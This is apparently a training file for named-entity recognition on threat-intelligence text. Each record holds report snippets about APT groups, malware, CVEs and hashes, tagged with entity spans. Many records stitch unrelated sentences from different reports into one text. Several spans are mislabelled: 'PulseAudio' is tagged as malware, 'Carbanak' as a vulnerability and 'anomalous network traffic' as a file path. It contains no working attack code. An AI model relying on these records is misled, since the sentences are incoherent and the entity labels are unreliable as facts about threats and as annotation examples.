{"text": "The first table contains 205 devices with some Linux properties ; the second contains the specific memory addresses associated with them that are needed for successful exploitation . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT . The group has operated since at least 2012 and has compromised high-profile telecommunications networks .", "spans": {"SYSTEM: Linux": [[47, 52]], "THREAT_ACTOR: Attackers": [[183, 192]], "VULNERABILITY: CVE-2018-0798": [[237, 250]], "ORGANIZATION: high-profile telecommunications networks": [[393, 433]]}, "info": {"id": "cyberner_stix_train_002684", "source": "cyberner_stix_train"}}
{"text": "These socially engineered emails contain web links of weaponized documents containing exploits or macros . In the second set they are making use of a dynamic DNS service by .", "spans": {"MALWARE: dynamic DNS service": [[150, 169]]}, "info": {"id": "cyberner_stix_train_002685", "source": "cyberner_stix_train"}}
{"text": "This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions , consolidating four previously unrelated clusters of threat actor activity into FireEye’s newest named advanced persistent threat group: APT32 . A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed – most likely detections were related to students’ and researchers’ scanning known collected samples and any incidents” remain unconfirmed and unknown .", "spans": {"ORGANIZATION: FireEye’s": [[254, 263]], "THREAT_ACTOR: APT32": [[311, 316]], "THREAT_ACTOR: groups'": [[412, 419]], "ORGANIZATION: Chinese universities": [[432, 452]]}, "info": {"id": "cyberner_stix_train_002686", "source": "cyberner_stix_train"}}
{"text": "Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone .", "spans": {"THREAT_ACTOR: actors": [[50, 56]], "VULNERABILITY: CVE-2019-0604": [[66, 79]], "TOOL: China Chopper webshell": [[125, 147]], "FILEPATH: ShooterAudio module": [[154, 173]], "MALWARE: PulseAudio": [[179, 189]]}, "info": {"id": "cyberner_stix_train_002687", "source": "cyberner_stix_train"}}
{"text": "This , together with HammerDuke ’s simplistic backdoor functionality , suggests that it is primarily used by the Dukes group as a secondary backdoor left on CozyDuke victims after CozyDuke performed the initial infection and stole any readily available information from them .", "spans": {"MALWARE: HammerDuke": [[21, 31]], "THREAT_ACTOR: Dukes": [[113, 118]], "MALWARE: CozyDuke": [[157, 165], [180, 188]]}, "info": {"id": "cyberner_stix_train_002688", "source": "cyberner_stix_train"}}
{"text": "Immediately after activation , the malware creates a textView element in a new window with the following layout parameters : All these parameters ensure the element is hidden from the user . This malware is capable of accessing device configuration data , downloading additional files , executing commands , modifying the registry , capturing screen shots , and exfiltrating data . APT33 : 99c1228d15e9a7693d67c4cb173eaec61bdb3e3efdd41ee38b941e733c7104f8 S-SHA2 .NET FTP tool . The file collected system information , and then invoked a WMI instance in the rootsecuritycenter namespace to identify security products installed on the system before dropping more data collection malware .", "spans": {"THREAT_ACTOR: APT33": [[382, 387]], "MALWARE: 99c1228d15e9a7693d67c4cb173eaec61bdb3e3efdd41ee38b941e733c7104f8 S-SHA2 .NET FTP": [[390, 470]]}, "info": {"id": "cyberner_stix_train_002689", "source": "cyberner_stix_train"}}
{"text": "We collect all data about your friends and family . Silence 's successful attacks currently have been limited to the CIS and Eastern European countries . We have medium confidence that this botnet falls under the FIN7 umbrella . Monitor for newly constructed services / daemons that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"THREAT_ACTOR: FIN7": [[213, 217]]}, "info": {"id": "cyberner_stix_train_002690", "source": "cyberner_stix_train"}}
{"text": "Mutex name : 20160509 .", "spans": {}, "info": {"id": "cyberner_stix_train_002691", "source": "cyberner_stix_train"}}
{"text": "Their tradecraft is superb , operational security second to none and the extensive usage of ‘ living-off-the-land ’ techniques enables them to easily bypass many security solutions they encounter .", "spans": {}, "info": {"id": "cyberner_stix_train_002692", "source": "cyberner_stix_train"}}
{"text": "Attackers create this scenario to persuade users to pay the ransom so they can gain back access to the device . Gorgon Group isn't the first actor group we've witnessed dabble in both nation state level and criminal attacks . idc.load_and_run_plugin None C2 RSA Verification", "spans": {"THREAT_ACTOR: Gorgon Group": [[112, 124]], "THREAT_ACTOR: actor group": [[141, 152]]}, "info": {"id": "cyberner_stix_train_002693", "source": "cyberner_stix_train"}}
{"text": "Proofpoint researchers observed one DanaBot affiliate ( Affid 11 ) specifically targeting Canada with \" Canada Post \" themed lures between January 1 and May 1 , 2019 . In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers .", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "TOOL: DanaBot": [[36, 43]], "ORGANIZATION: Canada Post": [[104, 115]], "MALWARE: publicly available tools": [[215, 239]], "MALWARE: Mimikatz": [[252, 260]], "MALWARE: Hacktool.Mimikatz": [[263, 280]], "SYSTEM: Windows": [[329, 336]], "VULNERABILITY: CVE-2016-0051": [[374, 387]]}, "info": {"id": "cyberner_stix_train_002694", "source": "cyberner_stix_train"}}
{"text": "After identifying compromised credentials and executed commands , CTU researchers shifted focus to determine how the threat actors were obtaining the shell and executing their commands on the compromised host .", "spans": {"ORGANIZATION: CTU": [[66, 69]]}, "info": {"id": "cyberner_stix_train_002695", "source": "cyberner_stix_train"}}
{"text": "A few of the CosmicDuke samples we discovered also included components that attempt to exploit either of the publicly known CVE-2010-0232 or CVE-2010- 4398 privilege escalation vulnerabilities .", "spans": {"MALWARE: CosmicDuke": [[13, 23]], "VULNERABILITY: CVE-2010-0232": [[124, 137]], "VULNERABILITY: CVE-2010- 4398": [[141, 155]]}, "info": {"id": "cyberner_stix_train_002696", "source": "cyberner_stix_train"}}
{"text": "This exploit file made use of the same shellcode that we have observed Transparent Tribe use across a number of spear phishing incidents . This event significantly affected the Russian cybercriminal world as the gang had stolen hundreds of millions of rubles during a few years of activity , and was considered a \" leader \" among cybercriminals .", "spans": {}, "info": {"id": "cyberner_stix_train_002697", "source": "cyberner_stix_train"}}
{"text": "The use of Twitter either to initially obtain the address of a C&C server ( or as a backup if no hardcoded primary C&C server responds ) is a feature also found in OnionDuke , CozyDuke , and HammerDuke .", "spans": {"TOOL: Twitter": [[11, 18]], "TOOL: C&C": [[63, 66], [115, 118]], "MALWARE: OnionDuke": [[164, 173]], "MALWARE: CozyDuke": [[176, 184]], "MALWARE: HammerDuke": [[191, 201]]}, "info": {"id": "cyberner_stix_train_002698", "source": "cyberner_stix_train"}}
{"text": "Such references would be in line with FrozenCell 's phishing tactics in which they used file names to lure people associated with the political party to open malicious documents . Lazarus was previously known to conduct cyberespionage and cybersabotage activities , such as attacks on Sony Pictures Entertainment with volumes of internal data leaked , and many system harddrives in the company wiped . Elfin targets in the U.S. have included organizations in the engineering , chemical , research , energy consultancy , finance , IT , and healthcare sectors . Developed in - house using C++ , the NoEscape ransomware uses a hybrid approach to encryption , combining ChaCha20 and RSA encryption algorithms for file encryption and key protection .", "spans": {"MALWARE: FrozenCell": [[38, 48]], "THREAT_ACTOR: Lazarus": [[180, 187]], "ORGANIZATION: Sony Pictures Entertainment": [[285, 312]], "THREAT_ACTOR: Elfin": [[402, 407]], "TOOL: C++": [[587, 590]], "MALWARE: NoEscape ransomware": [[597, 616]]}, "info": {"id": "cyberner_stix_train_002699", "source": "cyberner_stix_train"}}
{"text": "However , since the archive that is downloaded into the device has all the necessary information and the malicious actor has access to the device via SMS , the malicious operator can keep its activity even without the C2 infrastructure . In March 2018 , Trend Micro provided a detailed analysis of another campaign that bore the hallmarks of MuddyWater . Even though we don’t have the decryption key or loader , we have uncovered some interesting artifacts . Those desiring to steal payment card data typically install malware on point of sale systems POS with the intent of stealing magnetic stripe data .", "spans": {"ORGANIZATION: Trend Micro": [[254, 265]], "THREAT_ACTOR: MuddyWater": [[342, 352]]}, "info": {"id": "cyberner_stix_train_002700", "source": "cyberner_stix_train"}}
{"text": "If however by that time the Dukes are already operating within the victim ’s network , using an another toolset with different IOCs , then it is reasonable to assume that it will take much longer for the victim organization to notice the infiltration .", "spans": {"THREAT_ACTOR: Dukes": [[28, 33]], "TOOL: IOCs": [[127, 131]]}, "info": {"id": "cyberner_stix_train_002701", "source": "cyberner_stix_train"}}
{"text": "When an authorization token is stolen by a hacker , they can use this token to access all the Google services related to the user , including Google Play , Gmail , Google Docs , Google Drive , and Google Photos . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . the callback returns NULL from the mblock_t pointer if the instruction is not a top-level one . Also in 2015 , GReAT identified the Minidionis threat ( known by Kaspersky as CloudLook ) to be another backdoor from the same APT actor – this time using a cloud drive capability to store and download malware onto infected systems using a multi - dropper scheme .", "spans": {"ORGANIZATION: Google": [[94, 100]], "SYSTEM: Google Play": [[142, 153]], "SYSTEM: Gmail": [[156, 161]], "SYSTEM: Google Docs": [[164, 175]], "SYSTEM: Google Drive": [[178, 190]], "SYSTEM: Google Photos": [[197, 210]], "THREAT_ACTOR: BRONZE BUTLER": [[213, 226]], "VULNERABILITY: zero-day vulnerability": [[282, 304]], "TOOL: mblock_t": [[499, 507]], "ORGANIZATION: GReAT": [[575, 580]], "MALWARE: Minidionis": [[596, 606]], "ORGANIZATION: Kaspersky": [[625, 634]], "MALWARE: CloudLook": [[638, 647]], "THREAT_ACTOR: APT actor": [[687, 696]]}, "info": {"id": "cyberner_stix_train_002702", "source": "cyberner_stix_train"}}
{"text": "This extra stage is used to prevent automated systems from extracting the self-extracting archive .", "spans": {}, "info": {"id": "cyberner_stix_train_002703", "source": "cyberner_stix_train"}}
{"text": "Definition of populateConfigMap , which loads the map with values Correlating the last two steps , one can observe that the malware payload receives the configuration for the following properties : number – The default number to be send to the server ( in case the number is not available from the device ) api – The API key url – The URL to be used in WebView to display on the ransom note The malware saves this configuration to the shared preferences of the app data and then it sets up all the Broadcast Receivers . There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group . WinZip version 11.2 and 24.0, and the built-in unzIP S-TOOL tool in Windows , recognized that the attachment SHIPPING_MX00034900_PL_INV_pdf.zip is an invalid . The threat actor first detected towards the end of last year when it attacked at least 87 organizations around the world in two months ' time .", "spans": {"THREAT_ACTOR: APT15": [[572, 577]], "ORGANIZATION: NCC Group": [[624, 633]], "TOOL: WinZip": [[636, 642]], "TOOL: unzIP S-TOOL": [[683, 695]], "SYSTEM: Windows": [[704, 711]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.zip": [[745, 779]]}, "info": {"id": "cyberner_stix_train_002704", "source": "cyberner_stix_train"}}
{"text": "The role of ANDROIDOS_HTBENEWS.A and the malicious APK mentioned in the first method is to exploit a local privilege escalation vulnerability in Android devices . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies . The algorithm looks straightforward however some portions of the code had to be modified in order to correctly deobfuscate the code . But as a new documentary series on Hulu reveals [ SPOILER ALERT ! ] , there was just one problem with that theory : Their top suspect had killed himself more than a year before the hackers began publishing stolen user data .", "spans": {"MALWARE: ANDROIDOS_HTBENEWS.A": [[12, 32]], "VULNERABILITY: local privilege escalation vulnerability": [[101, 141]], "VULNERABILITY: Carbanak": [[235, 243]], "ORGANIZATION: financial industry": [[260, 278]], "ORGANIZATION: payment providers": [[289, 306]], "ORGANIZATION: retail industry": [[309, 324]], "ORGANIZATION: PR companies": [[329, 341]], "ORGANIZATION: Hulu": [[513, 517]]}, "info": {"id": "cyberner_stix_train_002705", "source": "cyberner_stix_train"}}
{"text": "More importantly , one of these files also enables the download of TeamViewer , a remote access tool that gives threat actors remote control over the system . In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform .", "spans": {"TOOL: TeamViewer": [[67, 77]], "THREAT_ACTOR: threat actors": [[112, 125]], "TOOL: emails": [[237, 243]], "FILEPATH: malicious attachments": [[249, 270]], "MALWARE: Scout": [[319, 324]]}, "info": {"id": "cyberner_stix_train_002706", "source": "cyberner_stix_train"}}
{"text": "In February , we recorded 767 infections . This suggests that due to the January 2017 attack , the targeted organization may have taken actions to counter known OilRig TTPs , in this case delivering malicious macro documents , causing the OilRig operators to adopt a different delivery tactic . The image file is a real image with a base64-encoded binary appended at the end . Better yet , reach out to us , and well be pleased to share a customized demonstration of the ThreatConnect Platform .", "spans": {"THREAT_ACTOR: OilRig": [[161, 167], [239, 245]], "THREAT_ACTOR: operators": [[246, 255]], "TOOL: ThreatConnect Platform .": [[471, 495]]}, "info": {"id": "cyberner_stix_train_002707", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //nttdocomo-qat [ . Finally , the use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlight APT28 's ability and interest in exploiting geopolitical events for their operations . This attack , if successful , can infect a compromised system with both Ursnif malware and GandCrab ransomware . Create NSPPE core dump files on NetScaler ( instructions from vendor ) .", "spans": {"ORGANIZATION: military": [[96, 104]], "THREAT_ACTOR: APT28": [[164, 169]], "ORGANIZATION: geopolitical": [[208, 220]], "MALWARE: Ursnif": [[323, 329]], "MALWARE: GandCrab": [[342, 350]]}, "info": {"id": "cyberner_stix_train_002708", "source": "cyberner_stix_train"}}
{"text": "and web applications ) via ws ( WebSockets ) or wss ( WebSockets over SSL/TLS ) to communicate with its C & C servers . More recently , Lazarus has also become involved in financially motivated attacks , including an US$81 million dollar theft from the Bangladesh Central Bank and the WannaCry ransomware . analyzed campaigns , such as the “ i.cmd ” and “ exit.exe ” files , and , at the same time , some new components have been introduced , for instance the “ rtegre.exe ” and the “ veter1605_MAPS_10cr0.exe ” file .", "spans": {"THREAT_ACTOR: Lazarus": [[136, 143]], "ORGANIZATION: Bangladesh Central Bank": [[253, 276]], "TOOL: WannaCry": [[285, 293]], "FILEPATH: i.cmd": [[342, 347]], "FILEPATH: exit.exe": [[356, 364]], "FILEPATH: rtegre.exe": [[462, 472]], "FILEPATH: veter1605_MAPS_10cr0.exe": [[485, 509]]}, "info": {"id": "cyberner_stix_train_002709", "source": "cyberner_stix_train"}}
{"text": "Intelligence suggests the group has been active since at least 2014 and is presently operating in multiple facilities targeting safety systems beyond Triconex .", "spans": {"TOOL: Triconex": [[150, 158]]}, "info": {"id": "cyberner_stix_train_002710", "source": "cyberner_stix_train"}}
{"text": "Earlier this year , the actor used “ .pw ” TLDs while the Bank Austria scheme highlighted above used “ .info ” . In most cases , threat actors typically stop or slow down their activities once their campaigns are publicly revealed . While the group has not been definitively attributed , circumstantial evidence suggests the group may be a pro-Indian or Indian entity .", "spans": {"SYSTEM: Bank Austria": [[58, 70]], "THREAT_ACTOR: threat actors": [[129, 142]]}, "info": {"id": "cyberner_stix_train_002711", "source": "cyberner_stix_train"}}
{"text": "The group distributing this family of malware decorates it in the branding and logos of well-known social media or media player apps , system update patches , or ( in its most recent campaign ) VPN client apps in an attempt to lure users into downloading , installing , and elevating the privileges of a Trojanized app hosted on a site not affiliated with any reputable app market or store . APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations . KtJvOXulgibfiHk is the password for uploaded zip . Masked Downloads A malware download , and installation , may be masked by renaming a legitimate Windows system framework such as Powershell.exe to hide from monitoring tools .", "spans": {"SYSTEM: VPN": [[194, 197]], "THREAT_ACTOR: APT37": [[392, 397]], "ORGANIZATION: research fellow": [[409, 424]], "ORGANIZATION: advisory member": [[427, 442]], "ORGANIZATION: journalist": [[449, 459]], "ORGANIZATION: strategic organizations": [[523, 546]]}, "info": {"id": "cyberner_stix_train_002712", "source": "cyberner_stix_train"}}
{"text": "This program is designed to capture keystrokes , take screenshots of the user 's desktop and get contents from the clipboard . The attackers began taking them offline in January 2014 .", "spans": {}, "info": {"id": "cyberner_stix_train_002713", "source": "cyberner_stix_train"}}
{"text": "We 've contacted the potentially affected users , disabled the applications on affected devices , and implemented changes in Verify Apps to protect all users . Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address . In April 2013 , Kaspersky Lab reported that a popular game was altered to include a backdoor in 2011 . This is possibly an indication of compromised login credentials , and it can be verified by further investigating the login attempts and recent activities by the same user .", "spans": {"SYSTEM: Verify Apps": [[125, 136]], "ORGANIZATION: Symantec": [[160, 168]], "THREAT_ACTOR: Leafminer": [[195, 204]], "VULNERABILITY: Heartbleed vulnerability": [[221, 245]], "VULNERABILITY: CVE-2014-0160": [[248, 261]], "ORGANIZATION: Kaspersky Lab": [[321, 334]]}, "info": {"id": "cyberner_stix_train_002714", "source": "cyberner_stix_train"}}
{"text": "GolfSpy ’ s infection chain GolfSpy 's Potential Impact Given GolfSpy ’ s information-stealing capabilities , this malware can effectively hijack an infected Android device . Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit . In various cases , the operators exchanged numerous messages with their victims for weeks before sending their malicious documents . The cryptographic certificates have also been exploited in attacks that have hit companies in the aerospace industry .", "spans": {"MALWARE: GolfSpy": [[0, 7], [28, 35], [62, 69]], "SYSTEM: Android": [[158, 165]], "VULNERABILITY: 0-day": [[286, 291]], "VULNERABILITY: Adobe Flash Player exploit": [[294, 320]], "SYSTEM: The cryptographic certificates": [[456, 486]], "ORGANIZATION: aerospace industry": [[554, 572]]}, "info": {"id": "cyberner_stix_train_002715", "source": "cyberner_stix_train"}}
{"text": "This is a local root exploit pack , and the Trojan uses 4 different exploit pack files , 3 for 32-bit systems and 1 for 64-bit-systems . The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party . Based on the routines used , we estimate that this attack has a global reach . The track controlling commands issued may have also resulted in tram collisions , a further risk to those on board and nearby the areas of impact .", "spans": {"ORGANIZATION: employees": [[168, 177]], "ORGANIZATION: government agencies": [[201, 220]], "ORGANIZATION: security services": [[223, 240]], "ORGANIZATION: students": [[255, 263]], "ORGANIZATION: Fatah political party": [[296, 317]]}, "info": {"id": "cyberner_stix_train_002716", "source": "cyberner_stix_train"}}
{"text": "As a result , no new instances of this app can be installed on iOS devices and existing installations can no longer be run . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . Our recent report , \" The Chronicles of the Hellsing APT : the Empire Strikes Back \" began with an introduction to the Naikon APT , describing it as \" One of the most active APTs in Asia , especially around the South China Sea \" .", "spans": {"SYSTEM: iOS": [[63, 66]], "MALWARE: malicious Word documents": [[146, 170]], "VULNERABILITY: Windows OLE Automation Array Remote Code Execution Vulnerability": [[199, 263]], "VULNERABILITY: CVE-2014-6332": [[275, 288]], "THREAT_ACTOR: Hellsing APT": [[335, 347]], "MALWARE: Empire Strikes Back": [[354, 373]], "THREAT_ACTOR: Naikon APT": [[410, 420]]}, "info": {"id": "cyberner_stix_train_002718", "source": "cyberner_stix_train"}}
{"text": "pl.millennium.corpApp eu.transfer24.app pl.aliorbank.aib pl.corelogic.mtoken alior.bankingapp.android com.ferratumbank.mobilebank com.swmind.vcc.android.bzwbk_mobile.app de.schildbach.wallet piuk.blockchain.android com.bitcoin.mwallet com.btcontract.wallet com.bitpay.wallet com.bitpay.copay btc.org.freewallet.app org.electrum.electrum Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks . Hash : 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a That piece explored how Biderman — who is Jewish — had become the target of concerted harassment campaigns by anti - Semitic and far - right groups online in the months leading up to the hack .", "spans": {"FILEPATH: 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a": [[461, 525]], "ORGANIZATION: Biderman": [[550, 558]], "ORGANIZATION: anti - Semitic and far - right groups": [[636, 673]]}, "info": {"id": "cyberner_stix_train_002719", "source": "cyberner_stix_train"}}
{"text": "The attackers first researched desired targets and then sent an email specifically to the target .", "spans": {"TOOL: email": [[64, 69]]}, "info": {"id": "cyberner_stix_train_002720", "source": "cyberner_stix_train"}}
{"text": "Computer network defenders can use this information to reduce the time and effort associated with responding to TG-3390 .", "spans": {"THREAT_ACTOR: TG-3390": [[112, 119]]}, "info": {"id": "cyberner_stix_train_002721", "source": "cyberner_stix_train"}}
{"text": "Information from a Russian recruitment website , linked to CNIIHM ’s official domain , indicates that CNIIHM is also dedicated to the development of intelligent systems for computer-aided design and control , and the creation of new information technologies .", "spans": {"ORGANIZATION: CNIIHM": [[59, 65], [102, 108]]}, "info": {"id": "cyberner_stix_train_002722", "source": "cyberner_stix_train"}}
{"text": "] 230 [ . This is in stark contrast to some other suspected Russian threat actors ( such as Operation Pawn Storm ) who appear to have increased their targeting of Ukraine following the crisis . The image below depicts the contents of the o402ek2m.php file . The Systemd configuration file leveraged by Sandworm enabled the group to maintain persistence on systems .", "spans": {"THREAT_ACTOR: threat actors": [[68, 81]], "FILEPATH: o402ek2m.php": [[238, 250]], "THREAT_ACTOR: Sandworm": [[302, 310]]}, "info": {"id": "cyberner_stix_train_002723", "source": "cyberner_stix_train"}}
{"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . However , to our knowledge , this is the first time Turla has used Metasploit as a first stage backdoor , instead of relying on one of its own tools such as Skipper .", "spans": {"MALWARE: Microsoft Word documents": [[64, 88]], "VULNERABILITY: CVE-2017-0199": [[100, 113]], "THREAT_ACTOR: Turla": [[168, 173]], "MALWARE: Metasploit": [[183, 193]], "MALWARE: Skipper": [[273, 280]]}, "info": {"id": "cyberner_stix_train_002724", "source": "cyberner_stix_train"}}
{"text": "Don ’ t install apps outside the official app store . The group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries . The python code is wrapped into an executable using pyinstaller . The commandline parameters m and h are mutually exclusive .", "spans": {"THREAT_ACTOR: group": [[58, 63]], "ORGANIZATION: financial": [[125, 134]], "ORGANIZATION: government": [[137, 147]], "ORGANIZATION: energy": [[150, 156]], "ORGANIZATION: chemical": [[159, 167]], "ORGANIZATION: telecommunications": [[170, 188]], "TOOL: python": [[216, 222]]}, "info": {"id": "cyberner_stix_train_002725", "source": "cyberner_stix_train"}}
{"text": "Stage 1 : Exodus One The first stage installed by downloading the malicious apps uploaded on Google Play Store only acts as a dropper . While investigating recent attacks performed by the threat actor group OilRig using their new Bondupdater version , Unit 42 researchers searched for additional Microsoft Office documents used by OilRig hoping to locate additional malware being used in other attacks during the same time period . By default , most of the virtual machines do not have a serial number on the disk . Some groups are even exploiting zero - day vulnerabilities , allowing them to cast a wider net of victims .", "spans": {"MALWARE: Exodus One": [[10, 20]], "SYSTEM: Google Play Store": [[93, 110]], "THREAT_ACTOR: threat actor group OilRig": [[188, 213]], "TOOL: Bondupdater": [[230, 241]], "ORGANIZATION: Unit 42": [[252, 259]], "THREAT_ACTOR: OilRig": [[331, 337]], "THREAT_ACTOR: groups": [[521, 527]], "VULNERABILITY: zero - day vulnerabilities": [[548, 574]]}, "info": {"id": "cyberner_stix_train_002726", "source": "cyberner_stix_train"}}
{"text": "98.05 % of all malware detected in 2013 targeted this platform , confirming both the popularity of this mobile OS and the vulnerability of its architecture . Usually , the delivered payload is either the well-known ' PlugX ' or ' HTTPBrowser ' RAT , a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups . Samples from both ShadowPad and Winnti found at these universities contain campaign identifiers and C&C URLs with the names of the universities , which indicates a targeted attack . The way Hack520 signs his messages in one hacker forum provides a clue pointing to this connection .", "spans": {"TOOL: PlugX": [[217, 222]], "TOOL: HTTPBrowser": [[230, 241]], "TOOL: RAT": [[244, 247]], "MALWARE: ShadowPad": [[373, 382]], "MALWARE: Winnti": [[387, 393]], "TOOL: C&C": [[455, 458]], "THREAT_ACTOR: Hack520": [[545, 552]]}, "info": {"id": "cyberner_stix_train_002727", "source": "cyberner_stix_train"}}
{"text": "CyCon US is a collaborative effort between the Army Cyber Institute at the United States Military Academy and the NATO Cooperative Cyber Military Academy and the NATO Cooperative Cyber Defence Centre of Excellence .", "spans": {"ORGANIZATION: CyCon": [[0, 5]], "ORGANIZATION: Army Cyber Institute": [[47, 67]], "ORGANIZATION: United States Military Academy": [[75, 105]], "ORGANIZATION: NATO": [[114, 118], [162, 166]], "ORGANIZATION: Cooperative Cyber Military Academy": [[119, 153]], "ORGANIZATION: Cooperative Cyber Defence Centre of Excellence": [[167, 213]]}, "info": {"id": "cyberner_stix_train_002728", "source": "cyberner_stix_train"}}
{"text": "The name Asacub appeared with version 4 in late 2015 ; previous versions were known as Trojan-SMS.AndroidOS.Smaps . The threat actors target a wide range of organizations : CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects , but also targeting other industry verticals and attacking organizations involved in international relations . The updates expanded scanner parameters and targets , looped execution of files via error messages , improved evasion techniques for scanning activities , and improved mining profits by killing off both the competition and their own previous miners . The use of zero - day vulnerabilities by ransomware groups like CL0P may trigger a significant shift in ransomware strategies , mirroring the adoption of the \" double extortion \" tactic in 2019 .", "spans": {"MALWARE: Asacub": [[9, 15]], "ORGANIZATION: CTU": [[173, 176]], "THREAT_ACTOR: TG-3390": [[203, 210]], "VULNERABILITY: zero - day vulnerabilities": [[654, 680]], "THREAT_ACTOR: ransomware groups": [[684, 701]], "THREAT_ACTOR: CL0P": [[707, 711]]}, "info": {"id": "cyberner_stix_train_002729", "source": "cyberner_stix_train"}}
{"text": "You can check the status of Google Play Protect on your device : Open your Android device 's Google Play Store app . Since the last report , PassCV has significantly expanded its targets to include victims in the United States , Taiwan , China and Russia . Threat actors accessed the source host via the hcdLoader RAT . The code is also very similar to the Metasploit version of the exploit , while the payload part of the shellcode has been written by the Miniduke authors re - using the backdoor ’s code .", "spans": {"SYSTEM: Google Play Protect": [[28, 47]], "SYSTEM: Google Play Store": [[93, 110]], "THREAT_ACTOR: PassCV": [[141, 147]], "MALWARE: hcdLoader": [[304, 313]], "THREAT_ACTOR: Miniduke authors": [[457, 473]]}, "info": {"id": "cyberner_stix_train_002730", "source": "cyberner_stix_train"}}
{"text": "The toolset includes reams of documentation explaining how the cyber weapons work , as well as details about their use in highly classified intelligence operations abroad . This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": {"ORGANIZATION: diplomats": [[192, 201]], "ORGANIZATION: journalists": [[297, 308]]}, "info": {"id": "cyberner_stix_train_002731", "source": "cyberner_stix_train"}}
{"text": "Their findings showed that Wolf is headquartered in Germany with offices in Cyprus , Bulgaria , Romania , India and ( possibly ) the U.S . While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions . The malware displays a blank .PDF file or a decoy document related to the targeted attack . There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": {"ORGANIZATION: SOC personnel": [[175, 188]]}, "info": {"id": "cyberner_stix_train_002732", "source": "cyberner_stix_train"}}
{"text": "In a different period of the “ Agent Smith ” campaign , droppers and core modules used various combinations of the “ a * * * d ” and “ i * * * e ” domains for malicious operations such as prey list query , patch request and ads request . In Clever Kitten 's attacks , the goal is lateral movement ; this is an attempt to move further into the target environment in order to begin intelligence collection . The scheduled tasks call msiexec.exe as a proxy to run the malicious code , much like how msiexec.exe was used during installation . Microsoft also issued emergency Exchange Server updates for the following vulnerabilities : The activity reported by Microsoft aligns with our observations .", "spans": {"MALWARE: Agent Smith": [[31, 42]], "FILEPATH: msiexec.exe": [[431, 442], [496, 507]], "ORGANIZATION: Microsoft": [[539, 548], [656, 665]], "SYSTEM: Exchange Server": [[571, 586]]}, "info": {"id": "cyberner_stix_train_002733", "source": "cyberner_stix_train"}}
{"text": "We can observe below , the procedure through which the artifact attempts to establish a connection with the IP address 176.31.112.10 .", "spans": {"IP_ADDRESS: 176.31.112.10": [[119, 132]]}, "info": {"id": "cyberner_stix_train_002734", "source": "cyberner_stix_train"}}
{"text": "The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police . Turla operators could use an already-compromised machine in the network of the victim 's organization to perform a local MitM attack .", "spans": {"THREAT_ACTOR: crime gang": [[18, 28]], "VULNERABILITY: Carbanak": [[40, 48]], "ORGANIZATION: financial institutions": [[97, 119]], "THREAT_ACTOR: Turla": [[243, 248]]}, "info": {"id": "cyberner_stix_train_002735", "source": "cyberner_stix_train"}}
{"text": "In the following image , we can see the function that parses the commands from the C & C server . The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network .", "spans": {"THREAT_ACTOR: Dukes": [[102, 107]], "THREAT_ACTOR: cyberespionage group": [[162, 182]], "ORGANIZATION: Kaspersky Lab": [[367, 380]], "FILEPATH: anomalous network traffic": [[425, 450]], "ORGANIZATION: government organization": [[456, 479]]}, "info": {"id": "cyberner_stix_train_002736", "source": "cyberner_stix_train"}}
